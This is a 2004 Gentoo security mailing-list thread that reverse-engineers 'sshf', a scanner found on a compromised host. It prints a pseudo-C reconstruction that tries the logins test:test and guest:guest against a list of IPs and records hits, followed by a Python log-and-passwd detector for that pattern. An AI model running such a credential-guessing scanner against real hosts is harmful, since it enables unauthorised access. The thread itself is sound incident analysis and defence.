On Thu, 29 Jul 2004 15:29:23 -0700, Alex Schultz <aschultz@××××××××.com>
wrote:

> I'm not 100% sure, but after a quick look it appears that sshf opens up
> the uniq.txt and then proceeds to connect to every IP using test:test or
> guest:guest. It then dumps out which of those account:ip combinations
> worked to vuln.txt. Then a person can just go through the vuln.txt and
> ssh in and perform whatever rooting they so choose.
>
> I wonder what the "ss" program does. It's got libpcap compiled into it
> so maybe it's some sort of sniffer and/or IP generator (creates
> bios.txt?).
>
> Br0mGreV wrote:
>
>> Hi,
>>
>> Has anyone started to reverse-engineer that damn soft 'sshf'? I'm sure
>> we can learn some information about the exploit if we
>> look at this file.
>> I'll start that tomorrow. Hope to give you some information from that
>> soon.
>>
>> GD
>>
>> -- gentoo-security@g.o mailing list
>>
>>
>
>
> --
> gentoo-security@g.o mailing list

OK, from what I've seen in that program, it's quite straightforward. I
copy here a long description of what happens; I'm not sure it's really
important, but we'll see:

First, the software is linked statically, of course.
We can find these 4 relevant strings:
"SSH-2.0-libssh-0.1"
"**MD5 or whatever** part of openSSL 0.9.d 17 Mar 2004"
"inflate 1.1.4 Copyright 1995-2002 Mark Adler"

main() {
    file = fopen("uniq.txt", "r");               /* one target address per line */
    if (file == NULL) {
        printf("nu pot deschide uniq.txt\n");    /* Romanian: "cannot open uniq.txt" */
        exit();
    }

Global_loop:
    if (fgets(C, 0x400, file) == 0)
        return;
    if ((end_of_l = strchr(C, 0xA)) != NULL)     /* linefeed */
        *end_of_l = 0;                           /* is replaced by end of string */
    Process = fork();
    /* **** (branch condition below is what the disassembly shows) */
    if (end_of_l != NULL) {
        ccheckauth(C, "test", "test");
        ccheckauth(C, "guest", "guest");
    } else {
        if (nb_proc++ <= '2') goto Global_loop;  /* '2' as read from the binary */
        while (nb_proc > '2') { wait(Process); } /* throttle the number of children */
        nb_proc--;
        goto Global_loop;
    }
    exit();
}


and the ccheckauth(host, login, passwd) {
    alarm(0xF);                                  /* give up on this host after 15 s */
    options = ssh_getopt(1, "none");
    options_set_username(options, login);
    options_set_host(options, host);

    if ((connection = ssh_connect(options)) == NULL) return;
    if (ssh_userauth_password(connection, 0, passwd) == 0) {
        file = fopen("vuln.txt", "a+");          /* append each hit to vuln.txt */
        fprintf(file, "%s:%s:%s\n", host, login, passwd);
        printf("GOT IT !! -> %s:%s:%s\n", host, login, passwd);
    } else {
        ssh_disconnect(connection);
    }
    return;
}


I assume this program is definitely a not-that-intelligent attack against
SSH servers, as explained before.
For all the addresses in uniq.txt, it tests for the stupid logins
"test"-"test" and "guest"-"guest",
and that's all.

I don't see anything else. I may check the ssh functions later, but I'm
not sure it's necessary.
If the system is weak enough to include that kind of login, it's possible
that the root password is empty or easy to guess, and that explains why
the attack is led from the root account.
Another hypothesis is that the first compromised computer wasn't exploited
that way.
And when he performed that first attack, he didn't find any SSH server to
exploit and aborted.

Have a good night && sweet dreams if needed, it's late here in France ;)


--
gentoo-security@g.o mailing list
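The reconstruction above fixes the shape of what sshf leaves behind on a probed host: per source address, at most two password attempts for exactly the users test and guest, each bounded by the 15 second alarm(), and an accepted login for one of them when the scan hit. The following Python is an added example written for this thread; it is not sshf, not code from the original post, and it assumes OpenSSH-style sshd syslog lines. The log lines, the passwd fragment and the year 2004 are constructed inputs, not captured data. It groups probe-user attempts by source, tags those that fit sshf's timing, lists any accepted logins, and separately checks a passwd file for the two accounts the scanner hunts for.

```python
"""Spot the sshf probe pattern in OpenSSH logs and the accounts it hunts for.

Added example for this thread (not the sshf binary, not the post's code).
Assumes OpenSSH-style sshd syslog lines; samples below are constructed.
"""
import re
from collections import defaultdict
from datetime import datetime

PROBE_USERS = ("test", "guest")
ALARM_SECONDS = 15  # alarm(0xF) in ccheckauth(): upper bound per attempt

# Constructed sample sshd lines (not a real capture).
SAMPLE_LOG = """\
Jul 29 23:10:01 gw sshd[2210]: Failed password for invalid user test from 192.0.2.77 port 40112 ssh2
Jul 29 23:10:03 gw sshd[2211]: Failed password for invalid user guest from 192.0.2.77 port 40113 ssh2
Jul 29 23:10:05 gw sshd[2212]: Failed password for invalid user test from 192.0.2.78 port 40114 ssh2
Jul 29 23:10:06 gw sshd[2213]: Accepted password for guest from 192.0.2.78 port 40115 ssh2
Jul 29 23:15:44 gw sshd[2290]: Failed password for alice from 198.51.100.9 port 51002 ssh2
Jul 29 23:40:00 gw sshd[2301]: Failed password for invalid user test from 203.0.113.5 port 3001 ssh2
Jul 29 23:59:30 gw sshd[2302]: Failed password for invalid user guest from 203.0.113.5 port 3002 ssh2
"""

# Constructed /etc/passwd fragment (not from any real host).
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/false
test:x:1001:1001::/home/test:/bin/bash
guest:x:1002:1002::/home/guest:/bin/sh
nobody:x:65534:65534::/nonexistent:/bin/false
"""

LINE_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Accepted|Failed) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\S+) port \d+ ssh2$"
)


def parse_events(log_text, year):
    """Return (timestamp, source_ip, user, accepted) for password-auth lines.

    Syslog timestamps carry no year, so the caller supplies it."""
    events = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(m["ts"], "%b %d %H:%M:%S").replace(year=year)
        events.append((ts, m["ip"], m["user"], m["result"] == "Accepted"))
    return events


def find_sshf_probes(events, window=ALARM_SECONDS):
    """Group probe-user attempts by source and tag those that fit sshf's shape.

    A source matches when it tried both probe users within 2*window seconds
    (one alarm() budget per attempt).  A pair spread far beyond that budget
    is still reported but not tagged, so slower scanners stay visible
    without being misattributed.  Accepted logins are listed regardless."""
    by_ip = defaultdict(list)
    for ts, ip, user, accepted in events:
        if user in PROBE_USERS:
            by_ip[ip].append((ts, user, accepted))
    report = {}
    for ip, attempts in by_ip.items():
        attempts.sort()
        span = (attempts[-1][0] - attempts[0][0]).total_seconds()
        users = sorted({u for _, u, _ in attempts})
        report[ip] = {
            "users": users,
            "span_s": span,
            "accepted": sorted(u for _, u, ok in attempts if ok),
            "matches_sshf": users == sorted(PROBE_USERS) and span <= 2 * window,
        }
    return report


def weak_accounts(passwd_text):
    """Names in a passwd file that sshf would try, if they have a real shell."""
    found = []
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if len(fields) < 7:
            continue
        name, shell = fields[0], fields[6]
        if name in PROBE_USERS and not shell.endswith(("/false", "/nologin")):
            found.append(name)
    return sorted(found)


if __name__ == "__main__":
    for ip, info in sorted(find_sshf_probes(parse_events(SAMPLE_LOG, 2004)).items()):
        print(ip, info)
    print("accounts sshf would try on this host:", weak_accounts(SAMPLE_PASSWD))
```

The 2*window bound is deliberately tied to the scanner's own alarm() rather than a generic brute-force threshold: two attempts that each had to finish inside 15 seconds cannot be more than about 30 seconds apart, so a test/guest pair spread over twenty minutes (the third source in the sample) is reported without being attributed to this tool.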